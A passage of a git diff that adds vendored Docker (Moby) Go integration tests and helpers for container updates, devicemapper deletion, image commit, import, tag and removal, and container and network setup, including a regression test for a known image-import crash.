+
+			inspect, err := client.ContainerInspect(ctx, id)
+			assert.NilError(t, err)
+			assert.Equal(t, inspect.State.ExitCode, d.expectedExitCode)
+		})
+	}
+}
+
+func TestDeleteDevicemapper(t *testing.T) {
+	skip.If(t, testEnv.DaemonInfo.Driver != "devicemapper")
+	skip.If(t, testEnv.IsRemoteDaemon, "cannot start daemon on remote test run")
+
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	id := container.Run(t, ctx, client, container.WithName("foo-"+t.Name()), container.WithCmd("echo"))
+
+	poll.WaitOn(t, container.IsStopped(ctx, client, id), poll.WithDelay(100*time.Millisecond))
+
+	inspect, err := client.ContainerInspect(ctx, id)
+	assert.NilError(t, err)
+
+	deviceID := inspect.GraphDriver.Data["DeviceId"]
+
+	// Find pool name from device name
+	deviceName := inspect.GraphDriver.Data["DeviceName"]
+	devicePrefix := deviceName[:strings.LastIndex(deviceName, "-")]
+	devicePool := fmt.Sprintf("/dev/mapper/%s-pool", devicePrefix)
+
+	result := icmd.RunCommand("dmsetup", "message", devicePool, "0", fmt.Sprintf("delete %s", deviceID))
+	result.Assert(t, icmd.Success)
+
+	err = client.ContainerRemove(ctx, id, types.ContainerRemoveOptions{})
+	assert.NilError(t, err)
+}
diff --git a/vendor/github.com/docker/docker/integration/container/update_linux_test.go b/vendor/github.com/docker/docker/integration/container/update_linux_test.go
new file mode 100644
index 0000000000..0e410a1461
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/container/update_linux_test.go
@@ -0,0 +1,107 @@
+package container // import "github.com/docker/docker/integration/container"
+
+import (
+	"context"
+	"strconv"
+	"strings"
+	"testing"
+	"time"
+
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/request"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/poll"
+	"gotest.tools/skip"
+)
+
+func TestUpdateMemory(t *testing.T) {
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux")
+	skip.If(t, !testEnv.DaemonInfo.MemoryLimit)
+	skip.If(t, !testEnv.DaemonInfo.SwapLimit)
+
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	cID := container.Run(t, ctx, client, func(c *container.TestContainerConfig) {
+		c.HostConfig.Resources = containertypes.Resources{
+			Memory: 200 * 1024 * 1024,
+		}
+	})
+
+	poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond))
+
+	const (
+		setMemory     int64 = 314572800
+		setMemorySwap int64 = 524288000
+	)
+
+	_, err := client.ContainerUpdate(ctx, cID, containertypes.UpdateConfig{
+		Resources: containertypes.Resources{
+			Memory:     setMemory,
+			MemorySwap: setMemorySwap,
+		},
+	})
+	assert.NilError(t, err)
+
+	inspect, err := client.ContainerInspect(ctx, cID)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(setMemory, inspect.HostConfig.Memory))
+	assert.Check(t, is.Equal(setMemorySwap, inspect.HostConfig.MemorySwap))
+
+	res, err := container.Exec(ctx, client, cID,
+		[]string{"cat", "/sys/fs/cgroup/memory/memory.limit_in_bytes"})
+	assert.NilError(t, err)
+	assert.Assert(t, is.Len(res.Stderr(), 0))
+	assert.Equal(t, 0, res.ExitCode)
+	assert.Check(t, is.Equal(strconv.FormatInt(setMemory, 10), strings.TrimSpace(res.Stdout())))
+
+	res, err = container.Exec(ctx, client, cID,
+		[]string{"cat", "/sys/fs/cgroup/memory/memory.memsw.limit_in_bytes"})
+	assert.NilError(t, err)
+	assert.Assert(t, is.Len(res.Stderr(), 0))
+	assert.Equal(t, 0, res.ExitCode)
+	assert.Check(t, is.Equal(strconv.FormatInt(setMemorySwap, 10), strings.TrimSpace(res.Stdout())))
+}
+
+func TestUpdateCPUQuota(t *testing.T) {
+	t.Parallel()
+
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	cID := container.Run(t, ctx, client)
+
+	for _, test := range []struct {
+		desc   string
+		update int64
+	}{
+		{desc: "some random value", update: 15000},
+		{desc: "a higher value", update: 20000},
+		{desc: "a lower value", update: 10000},
+		{desc: "unset value", update: -1},
+	} {
+		if _, err := client.ContainerUpdate(ctx, cID, containertypes.UpdateConfig{
+			Resources: containertypes.Resources{
+				CPUQuota: test.update,
+			},
+		}); err != nil {
+			t.Fatal(err)
+		}
+
+		inspect, err := client.ContainerInspect(ctx, cID)
+		assert.NilError(t, err)
+		assert.Check(t, is.Equal(test.update, inspect.HostConfig.CPUQuota))
+
+		res, err := container.Exec(ctx, client, cID,
+			[]string{"/bin/cat", "/sys/fs/cgroup/cpu/cpu.cfs_quota_us"})
+		assert.NilError(t, err)
+		assert.Assert(t, is.Len(res.Stderr(), 0))
+		assert.Equal(t, 0, res.ExitCode)
+
+		assert.Check(t, is.Equal(strconv.FormatInt(test.update, 10), strings.TrimSpace(res.Stdout())))
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration/container/update_test.go b/vendor/github.com/docker/docker/integration/container/update_test.go
new file mode 100644
index 0000000000..0e32184d27
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/container/update_test.go
@@ -0,0 +1,64 @@
+package container // import "github.com/docker/docker/integration/container"
+
+import (
+	"context"
+	"testing"
+	"time"
+
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/request"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/poll"
+)
+
+func TestUpdateRestartPolicy(t *testing.T) {
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	cID := container.Run(t, ctx, client, container.WithCmd("sh", "-c", "sleep 1 && false"), func(c *container.TestContainerConfig) {
+		c.HostConfig.RestartPolicy = containertypes.RestartPolicy{
+			Name:              "on-failure",
+			MaximumRetryCount: 3,
+		}
+	})
+
+	_, err := client.ContainerUpdate(ctx, cID, containertypes.UpdateConfig{
+		RestartPolicy: containertypes.RestartPolicy{
+			Name:              "on-failure",
+			MaximumRetryCount: 5,
+		},
+	})
+	assert.NilError(t, err)
+
+	timeout := 60 * time.Second
+	if testEnv.OSType == "windows" {
+		timeout = 180 * time.Second
+	}
+
+	poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), poll.WithDelay(100*time.Millisecond), poll.WithTimeout(timeout))
+
+	inspect, err := client.ContainerInspect(ctx, cID)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(inspect.RestartCount, 5))
+	assert.Check(t, is.Equal(inspect.HostConfig.RestartPolicy.MaximumRetryCount, 5))
+}
+
+func TestUpdateRestartWithAutoRemove(t *testing.T) {
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	cID := container.Run(t, ctx, client, func(c *container.TestContainerConfig) {
+		c.HostConfig.AutoRemove = true
+	})
+
+	_, err := client.ContainerUpdate(ctx, cID, containertypes.UpdateConfig{
+		RestartPolicy: containertypes.RestartPolicy{
+			Name: "always",
+		},
+	})
+	assert.Check(t, is.ErrorContains(err, "Restart policy cannot be updated because AutoRemove is enabled for the container"))
+}
diff --git a/vendor/github.com/docker/docker/integration/doc.go b/vendor/github.com/docker/docker/integration/doc.go
new file mode 100644
index 0000000000..ee4bf50430
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/doc.go
@@ -0,0 +1,3 @@
+// Package integration provides integrations tests for Moby (API).
+// These tests require a daemon (dockerd for now) to run.
+package integration // import "github.com/docker/docker/integration"
diff --git a/vendor/github.com/docker/docker/integration/image/commit_test.go b/vendor/github.com/docker/docker/integration/image/commit_test.go
new file mode 100644
index 0000000000..4555391262
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/image/commit_test.go
@@ -0,0 +1,48 @@
+package image // import "github.com/docker/docker/integration/image"
+
+import (
+	"context"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/request"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/skip"
+)
+
+func TestCommitInheritsEnv(t *testing.T) {
+	skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.36"), "broken in earlier versions")
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	cID1 := container.Create(t, ctx, client)
+
+	commitResp1, err := client.ContainerCommit(ctx, cID1, types.ContainerCommitOptions{
+		Changes:   []string{"ENV PATH=/bin"},
+		Reference: "test-commit-image",
+	})
+	assert.NilError(t, err)
+
+	image1, _, err := client.ImageInspectWithRaw(ctx, commitResp1.ID)
+	assert.NilError(t, err)
+
+	expectedEnv1 := []string{"PATH=/bin"}
+	assert.Check(t, is.DeepEqual(expectedEnv1, image1.Config.Env))
+
+	cID2 := container.Create(t, ctx, client, container.WithImage(image1.ID))
+
+	commitResp2, err := client.ContainerCommit(ctx, cID2, types.ContainerCommitOptions{
+		Changes:   []string{"ENV PATH=/usr/bin:$PATH"},
+		Reference: "test-commit-image",
+	})
+	assert.NilError(t, err)
+
+	image2, _, err := client.ImageInspectWithRaw(ctx, commitResp2.ID)
+	assert.NilError(t, err)
+	expectedEnv2 := []string{"PATH=/usr/bin:/bin"}
+	assert.Check(t, is.DeepEqual(expectedEnv2, image2.Config.Env))
+}
diff --git a/vendor/github.com/docker/docker/integration/image/import_test.go b/vendor/github.com/docker/docker/integration/image/import_test.go
new file mode 100644
index 0000000000..89dddf2cc8
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/image/import_test.go
@@ -0,0 +1,42 @@
+package image // import "github.com/docker/docker/integration/image"
+
+import (
+	"archive/tar"
+	"bytes"
+	"context"
+	"io"
+	"runtime"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/internal/test/request"
+	"github.com/docker/docker/internal/testutil"
+)
+
+// Ensure we don't regress on CVE-2017-14992.
+func TestImportExtremelyLargeImageWorks(t *testing.T) {
+	if runtime.GOARCH == "arm64" {
+		t.Skip("effective test will be time out")
+	}
+
+	client := request.NewAPIClient(t)
+
+	// Construct an empty tar archive with about 8GB of junk padding at the
+	// end. This should not cause any crashes (the padding should be mostly
+	// ignored).
+	var tarBuffer bytes.Buffer
+
+	tw := tar.NewWriter(&tarBuffer)
+	if err := tw.Close(); err != nil {
+		t.Fatal(err)
+	}
+	imageRdr := io.MultiReader(&tarBuffer, io.LimitReader(testutil.DevZero, 8*1024*1024*1024))
+
+	_, err := client.ImageImport(context.Background(),
+		types.ImageImportSource{Source: imageRdr, SourceName: "-"},
+		"test1234:v42",
+		types.ImageImportOptions{})
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration/image/main_test.go b/vendor/github.com/docker/docker/integration/image/main_test.go
new file mode 100644
index 0000000000..1b4270dfc6
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/image/main_test.go
@@ -0,0 +1,33 @@
+package image // import "github.com/docker/docker/integration/image"
+
+import (
+	"fmt"
+	"os"
+	"testing"
+
+	"github.com/docker/docker/internal/test/environment"
+)
+
+var testEnv *environment.Execution
+
+func TestMain(m *testing.M) {
+	var err error
+	testEnv, err = environment.New()
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+	err = environment.EnsureFrozenImagesLinux(testEnv)
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+
+	testEnv.Print()
+	os.Exit(m.Run())
+}
+
+func setupTest(t *testing.T) func() {
+	environment.ProtectAll(t, testEnv)
+	return func() { testEnv.Clean(t) }
+}
diff --git a/vendor/github.com/docker/docker/integration/image/remove_test.go b/vendor/github.com/docker/docker/integration/image/remove_test.go
new file mode 100644
index 0000000000..4f9122a5e3
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/image/remove_test.go
@@ -0,0 +1,59 @@
+package image // import "github.com/docker/docker/integration/image"
+
+import (
+	"context"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/request"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestRemoveImageOrphaning(t *testing.T) {
+	defer setupTest(t)()
+	ctx := context.Background()
+	client := request.NewAPIClient(t)
+
+	img := "test-container-orphaning"
+
+	// Create a container from busybox, and commit a small change so we have a new image
+	cID1 := container.Create(t, ctx, client, container.WithCmd(""))
+	commitResp1, err := client.ContainerCommit(ctx, cID1, types.ContainerCommitOptions{
+		Changes:   []string{`ENTRYPOINT ["true"]`},
+		Reference: img,
+	})
+	assert.NilError(t, err)
+
+	// verifies that reference now points to first image
+	resp, _, err := client.ImageInspectWithRaw(ctx, img)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(resp.ID, commitResp1.ID))
+
+	// Create a container from created image, and commit a small change with same reference name
+	cID2 := container.Create(t, ctx, client, container.WithImage(img), container.WithCmd(""))
+	commitResp2, err := client.ContainerCommit(ctx, cID2, types.ContainerCommitOptions{
+		Changes:   []string{`LABEL Maintainer="Integration Tests"`},
+		Reference: img,
+	})
+	assert.NilError(t, err)
+
+	// verifies that reference now points to second image
+	resp, _, err = client.ImageInspectWithRaw(ctx, img)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(resp.ID, commitResp2.ID))
+
+	// try to remove the image, should not error out.
+	_, err = client.ImageRemove(ctx, img, types.ImageRemoveOptions{})
+	assert.NilError(t, err)
+
+	// check if the first image is still there
+	resp, _, err = client.ImageInspectWithRaw(ctx, commitResp1.ID)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(resp.ID, commitResp1.ID))
+
+	// check if the second image has been deleted
+	_, _, err = client.ImageInspectWithRaw(ctx, commitResp2.ID)
+	assert.Check(t, is.ErrorContains(err, "No such image:"))
+}
diff --git a/vendor/github.com/docker/docker/integration/image/tag_test.go b/vendor/github.com/docker/docker/integration/image/tag_test.go
new file mode 100644
index 0000000000..55c3ff7b2b
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/image/tag_test.go
@@ -0,0 +1,140 @@
+package image // import "github.com/docker/docker/integration/image"
+
+import (
+	"context"
+	"fmt"
+	"testing"
+
+	"github.com/docker/docker/internal/test/request"
+	"github.com/docker/docker/internal/testutil"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+// tagging a named image in a new unprefixed repo should work
+func TestTagUnprefixedRepoByNameOrName(t *testing.T) {
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	// By name
+	err := client.ImageTag(ctx, "busybox:latest", "testfoobarbaz")
+	assert.NilError(t, err)
+
+	// By ID
+	insp, _, err := client.ImageInspectWithRaw(ctx, "busybox")
+	assert.NilError(t, err)
+	err = client.ImageTag(ctx, insp.ID, "testfoobarbaz")
+	assert.NilError(t, err)
+}
+
+// ensure we don't allow the use of invalid repository names or tags; these tag operations should fail
+// TODO (yongtang): Migrate to unit tests
+func TestTagInvalidReference(t *testing.T) {
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	invalidRepos := []string{"fo$z$", "Foo@3cc", "Foo$3", "Foo*3", "Fo^3", "Foo!3", "F)xcz(", "fo%asd", "FOO/bar"}
+
+	for _, repo := range invalidRepos {
+		err := client.ImageTag(ctx, "busybox", repo)
+		assert.Check(t, is.ErrorContains(err, "not a valid repository/tag"))
+	}
+
+	longTag := testutil.GenerateRandomAlphaOnlyString(121)
+
+	invalidTags := []string{"repo:fo$z$", "repo:Foo@3cc", "repo:Foo$3", "repo:Foo*3", "repo:Fo^3", "repo:Foo!3", "repo:%goodbye", "repo:#hashtagit", "repo:F)xcz(", "repo:-foo", "repo:..", longTag}
+
+	for _, repotag := range invalidTags {
+		err := client.ImageTag(ctx, "busybox", repotag)
+		assert.Check(t, is.ErrorContains(err, "not a valid repository/tag"))
+	}
+
+	// test repository name begin with '-'
+	err := client.ImageTag(ctx, "busybox:latest", "-busybox:test")
+	assert.Check(t, is.ErrorContains(err, "Error parsing reference"))
+
+	// test namespace name begin with '-'
+	err = client.ImageTag(ctx, "busybox:latest", "-test/busybox:test")
+	assert.Check(t, is.ErrorContains(err, "Error parsing reference"))
+
+	// test index name begin with '-'
+	err = client.ImageTag(ctx, "busybox:latest", "-index:5000/busybox:test")
+	assert.Check(t, is.ErrorContains(err, "Error parsing reference"))
+
+	// test setting tag fails
+	err = client.ImageTag(ctx, "busybox:latest", "sha256:sometag")
+	assert.Check(t, is.ErrorContains(err, "refusing to create an ambiguous tag using digest algorithm as name"))
+}
+
+// ensure we allow the use of valid tags
+func TestTagValidPrefixedRepo(t *testing.T) {
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	validRepos := []string{"fooo/bar", "fooaa/test", "foooo:t", "HOSTNAME.DOMAIN.COM:443/foo/bar"}
+
+	for _, repo := range validRepos {
+		err := client.ImageTag(ctx, "busybox", repo)
+		assert.NilError(t, err)
+	}
+}
+
+// tag an image with an existed tag name without -f option should work
+func TestTagExistedNameWithoutForce(t *testing.T) {
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	err := client.ImageTag(ctx, "busybox:latest", "busybox:test")
+	assert.NilError(t, err)
+}
+
+// ensure tagging using official names works
+// ensure all tags result in the same name
+func TestTagOfficialNames(t *testing.T) {
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	names := []string{
+		"docker.io/busybox",
+		"index.docker.io/busybox",
+		"library/busybox",
+		"docker.io/library/busybox",
+		"index.docker.io/library/busybox",
+	}
+
+	for _, name := range names {
+		err := client.ImageTag(ctx, "busybox", name+":latest")
+		assert.NilError(t, err)
+
+		// ensure we don't have multiple tag names.
+		insp, _, err := client.ImageInspectWithRaw(ctx, "busybox")
+		assert.NilError(t, err)
+		assert.Assert(t, !is.Contains(insp.RepoTags, name)().Success())
+	}
+
+	for _, name := range names {
+		err := client.ImageTag(ctx, name+":latest", "fooo/bar:latest")
+		assert.NilError(t, err)
+	}
+}
+
+// ensure tags can not match digests
+func TestTagMatchesDigest(t *testing.T) {
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	digest := "busybox@sha256:abcdef76720241213f5303bda7704ec4c2ef75613173910a56fb1b6e20251507"
+	// test setting tag fails
+	err := client.ImageTag(ctx, "busybox:latest", digest)
+	assert.Check(t, is.ErrorContains(err, "refusing to create a tag with a digest reference"))
+
+	// check that no new image matches the digest
+	_, _, err = client.ImageInspectWithRaw(ctx, digest)
+	assert.Check(t, is.ErrorContains(err, fmt.Sprintf("No such image: %s", digest)))
+}
diff --git a/vendor/github.com/docker/docker/integration/internal/container/container.go b/vendor/github.com/docker/docker/integration/internal/container/container.go
new file mode 100644
index 0000000000..489e07154a
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/internal/container/container.go
@@ -0,0 +1,54 @@
+package container
+
+import (
+	"context"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/network"
+	"github.com/docker/docker/client"
+	"gotest.tools/assert"
+)
+
+// TestContainerConfig holds container configuration struct that
+// are used in api calls.
+type TestContainerConfig struct {
+	Name             string
+	Config           *container.Config
+	HostConfig       *container.HostConfig
+	NetworkingConfig *network.NetworkingConfig
+}
+
+// Create creates a container with the specified options
+func Create(t *testing.T, ctx context.Context, client client.APIClient, ops ...func(*TestContainerConfig)) string { // nolint: golint
+	t.Helper()
+	config := &TestContainerConfig{
+		Config: &container.Config{
+			Image: "busybox",
+			Cmd:   []string{"top"},
+		},
+		HostConfig:       &container.HostConfig{},
+		NetworkingConfig: &network.NetworkingConfig{},
+	}
+
+	for _, op := range ops {
+		op(config)
+	}
+
+	c, err := client.ContainerCreate(ctx, config.Config, config.HostConfig, config.NetworkingConfig, config.Name)
+	assert.NilError(t, err)
+
+	return c.ID
+}
+
+// Run creates and start a container with the specified options
+func Run(t *testing.T, ctx context.Context, client client.APIClient, ops ...func(*TestContainerConfig)) string { // nolint: golint
+	t.Helper()
+	id := Create(t, ctx, client, ops...)
+
+	err := client.ContainerStart(ctx, id, types.ContainerStartOptions{})
+	assert.NilError(t, err)
+
+	return id
+}
diff --git a/vendor/github.com/docker/docker/integration/internal/container/exec.go b/vendor/github.com/docker/docker/integration/internal/container/exec.go
new file mode 100644
index 0000000000..55ad23aeb5
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/internal/container/exec.go
@@ -0,0 +1,86 @@
+package container
+
+import (
+	"bytes"
+	"context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/pkg/stdcopy"
+)
+
+// ExecResult represents a result returned from Exec()
+type ExecResult struct {
+	ExitCode  int
+	outBuffer *bytes.Buffer
+	errBuffer *bytes.Buffer
+}
+
+// Stdout returns stdout output of a command run by Exec()
+func (res *ExecResult) Stdout() string {
+	return res.outBuffer.String()
+}
+
+// Stderr returns stderr output of a command run by Exec()
+func (res *ExecResult) Stderr() string {
+	return res.errBuffer.String()
+}
+
+// Combined returns combined stdout and stderr output of a command run by Exec()
+func (res *ExecResult) Combined() string {
+	return res.outBuffer.String() + res.errBuffer.String()
+}
+
+// Exec executes a command inside a container, returning the result
+// containing stdout, stderr, and exit code. Note:
+//  - this is a synchronous operation;
+//  - cmd stdin is closed.
+func Exec(ctx context.Context, cli client.APIClient, id string, cmd []string) (ExecResult, error) {
+	// prepare exec
+	execConfig := types.ExecConfig{
+		AttachStdout: true,
+		AttachStderr: true,
+		Cmd:          cmd,
+	}
+	cresp, err := cli.ContainerExecCreate(ctx, id, execConfig)
+	if err != nil {
+		return ExecResult{}, err
+	}
+	execID := cresp.ID
+
+	// run it, with stdout/stderr attached
+	aresp, err := cli.ContainerExecAttach(ctx, execID, types.ExecStartCheck{})
+	if err != nil {
+		return ExecResult{}, err
+	}
+	defer aresp.Close()
+
+	// read the output
+	var outBuf, errBuf bytes.Buffer
+	outputDone := make(chan error)
+
+	go func() {
+		// StdCopy demultiplexes the stream into two buffers
+		_, err = stdcopy.StdCopy(&outBuf, &errBuf, aresp.Reader)
+		outputDone <- err
+	}()
+
+	select {
+	case err := <-outputDone:
+		if err != nil {
+			return ExecResult{}, err
+		}
+		break
+
+	case <-ctx.Done():
+		return ExecResult{}, ctx.Err()
+	}
+
+	// get the exit code
+	iresp, err := cli.ContainerExecInspect(ctx, execID)
+	if err != nil {
+		return ExecResult{}, err
+	}
+
+	return ExecResult{ExitCode: iresp.ExitCode, outBuffer: &outBuf, errBuffer: &errBuf}, nil
+}
diff --git a/vendor/github.com/docker/docker/integration/internal/container/ops.go b/vendor/github.com/docker/docker/integration/internal/container/ops.go
new file mode 100644
index 0000000000..df5598b62f
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/internal/container/ops.go
@@ -0,0 +1,136 @@
+package container
+
+import (
+	"fmt"
+
+	containertypes "github.com/docker/docker/api/types/container"
+	networktypes "github.com/docker/docker/api/types/network"
+	"github.com/docker/docker/api/types/strslice"
+	"github.com/docker/go-connections/nat"
+)
+
+// WithName sets the name of the container
+func WithName(name string) func(*TestContainerConfig) {
+	return func(c *TestContainerConfig) {
+		c.Name = name
+	}
+}
+
+// WithLinks sets the links of the container
+func WithLinks(links ...string) func(*TestContainerConfig) {
+	return func(c *TestContainerConfig) {
+		c.HostConfig.Links = links
+	}
+}
+
+// WithImage sets the image of the container
+func WithImage(image string) func(*TestContainerConfig) {
+	return func(c *TestContainerConfig) {
+		c.Config.Image = image
+	}
+}
+
+// WithCmd sets the comannds of the container
+func WithCmd(cmds ...string) func(*TestContainerConfig) {
+	return func(c *TestContainerConfig) {
+		c.Config.Cmd = strslice.StrSlice(cmds)
+	}
+}
+
+// WithNetworkMode sets the network mode of the container
+func WithNetworkMode(mode string) func(*TestContainerConfig) {
+	return func(c *TestContainerConfig) {
+		c.HostConfig.NetworkMode = containertypes.NetworkMode(mode)
+	}
+}
+
+// WithExposedPorts sets the exposed ports of the container
+func WithExposedPorts(ports ...string) func(*TestContainerConfig) {
+	return func(c *TestContainerConfig) {
+		c.Config.ExposedPorts = map[nat.Port]struct{}{}
+		for _, port := range ports {
+			c.Config.ExposedPorts[nat.Port(port)] = struct{}{}
+		}
+	}
+}
+
+// WithTty sets the TTY mode of the container
+func WithTty(tty bool) func(*TestContainerConfig) {
+	return func(c *TestContainerConfig) {
+		c.Config.Tty = tty
+	}
+}
+
+// WithWorkingDir sets the working dir of the container
+func WithWorkingDir(dir string) func(*TestContainerConfig) {
+	return func(c *TestContainerConfig) {
+		c.Config.WorkingDir = dir
+	}
+}
+
+// WithVolume sets the volume of the container
+func WithVolume(name string) func(*TestContainerConfig) {
+	return func(c *TestContainerConfig) {
+		if c.Config.Volumes == nil {
+			c.Config.Volumes = map[string]struct{}{}
+		}
+		c.Config.Volumes[name] = struct{}{}
+	}
+}
+
+// WithBind sets the bind mount of the container
+func WithBind(src, target string) func(*TestContainerConfig) {
+	return func(c *TestContainerConfig) {
+		c.HostConfig.Binds = append(c.HostConfig.Binds, fmt.Sprintf("%s:%s", src, target))
+	}
+}
+
+// WithIPv4 sets the specified ip for the specified network of the container
+func WithIPv4(network, ip string) func(*TestContainerConfig) {
+	return func(c *TestContainerConfig) {
+		if c.NetworkingConfig.EndpointsConfig == nil {
+			c.NetworkingConfig.EndpointsConfig = map[string]*networktypes.EndpointSettings{}
+		}
+		if v, ok := c.NetworkingConfig.EndpointsConfig[network]; !ok || v == nil {
+			c.NetworkingConfig.EndpointsConfig[network] = &networktypes.EndpointSettings{}
+		}
+		if c.NetworkingConfig.EndpointsConfig[network].IPAMConfig == nil {
+			c.NetworkingConfig.EndpointsConfig[network].IPAMConfig = &networktypes.EndpointIPAMConfig{}
+		}
+		c.NetworkingConfig.EndpointsConfig[network].IPAMConfig.IPv4Address = ip
+	}
+}
+
+// WithIPv6 sets the specified ip6 for the specified network of the container
+func WithIPv6(network, ip string) func(*TestContainerConfig) {
+	return func(c *TestContainerConfig) {
+		if c.NetworkingConfig.EndpointsConfig == nil {
+			c.NetworkingConfig.EndpointsConfig = map[string]*networktypes.EndpointSettings{}
+		}
+		if v, ok := c.NetworkingConfig.EndpointsConfig[network]; !ok || v == nil {
+			c.NetworkingConfig.EndpointsConfig[network] = &networktypes.EndpointSettings{}
+		}
+		if c.NetworkingConfig.EndpointsConfig[network].IPAMConfig == nil {
+			c.NetworkingConfig.EndpointsConfig[network].IPAMConfig = &networktypes.EndpointIPAMConfig{}
+		}
+		c.NetworkingConfig.EndpointsConfig[network].IPAMConfig.IPv6Address = ip
+	}
+}
+
+// WithLogDriver sets the log driver to use for the container
+func WithLogDriver(driver string) func(*TestContainerConfig) {
+	return func(c *TestContainerConfig) {
+		if c.HostConfig == nil {
+			c.HostConfig = &containertypes.HostConfig{}
+		}
+		c.HostConfig.LogConfig.Type = driver
+	}
+}
+
+// WithAutoRemove sets the container to be removed on exit
+func WithAutoRemove(c *TestContainerConfig) {
+	if c.HostConfig == nil {
+		c.HostConfig = &containertypes.HostConfig{}
+	}
+	c.HostConfig.AutoRemove = true
+}
diff --git a/vendor/github.com/docker/docker/integration/internal/container/states.go b/vendor/github.com/docker/docker/integration/internal/container/states.go
new file mode 100644
index 0000000000..088407deb8
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/internal/container/states.go
@@ -0,0 +1,41 @@
+package container
+
+import (
+	"context"
+	"strings"
+
+	"github.com/docker/docker/client"
+	"gotest.tools/poll"
+)
+
+// IsStopped verifies the container is in stopped state.
+func IsStopped(ctx context.Context, client client.APIClient, containerID string) func(log poll.LogT) poll.Result {
+	return func(log poll.LogT) poll.Result {
+		inspect, err := client.ContainerInspect(ctx, containerID)
+
+		switch {
+		case err != nil:
+			return poll.Error(err)
+		case !inspect.State.Running:
+			return poll.Success()
+		default:
+			return poll.Continue("waiting for container to be stopped")
+		}
+	}
+}
+
+// IsInState verifies the container is in one of the specified state, e.g., "running", "exited", etc.
+func IsInState(ctx context.Context, client client.APIClient, containerID string, state ...string) func(log poll.LogT) poll.Result {
+	return func(log poll.LogT) poll.Result {
+		inspect, err := client.ContainerInspect(ctx, containerID)
+		if err != nil {
+			return poll.Error(err)
+		}
+		for _, v := range state {
+			if inspect.State.Status == v {
+				return poll.Success()
+			}
+		}
+		return poll.Continue("waiting for container to be one of (%s), currently %s", strings.Join(state, ", "), inspect.State.Status)
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration/internal/network/network.go b/vendor/github.com/docker/docker/integration/internal/network/network.go
new file mode 100644
index 0000000000..9c13114f92
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/internal/network/network.go
@@ -0,0 +1,35 @@
+package network
+
+import (
+	"context"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/client"
+	"gotest.tools/assert"
+)
+
+func createNetwork(ctx context.Context, client client.APIClient, name string, ops ...func(*types.NetworkCreate)) (string, error) {
+	config := types.NetworkCreate{}
+
+	for _, op := range ops {
+		op(&config)
+	}
+
+	n, err := client.NetworkCreate(ctx, name, config)
+	return n.ID, err
+}
+
+// Create creates a network with the specified options
+func Create(ctx context.Context, client client.APIClient, name string, ops ...func(*types.NetworkCreate)) (string, error) {
+	return createNetwork(ctx, client, name, ops...)
+}
+
+// CreateNoError creates a network with the specified options and verifies there were no errors
+func CreateNoError(t *testing.T, ctx context.Context, client client.APIClient, name string, ops ...func(*types.NetworkCreate)) string { // nolint: golint
+	t.Helper()
+
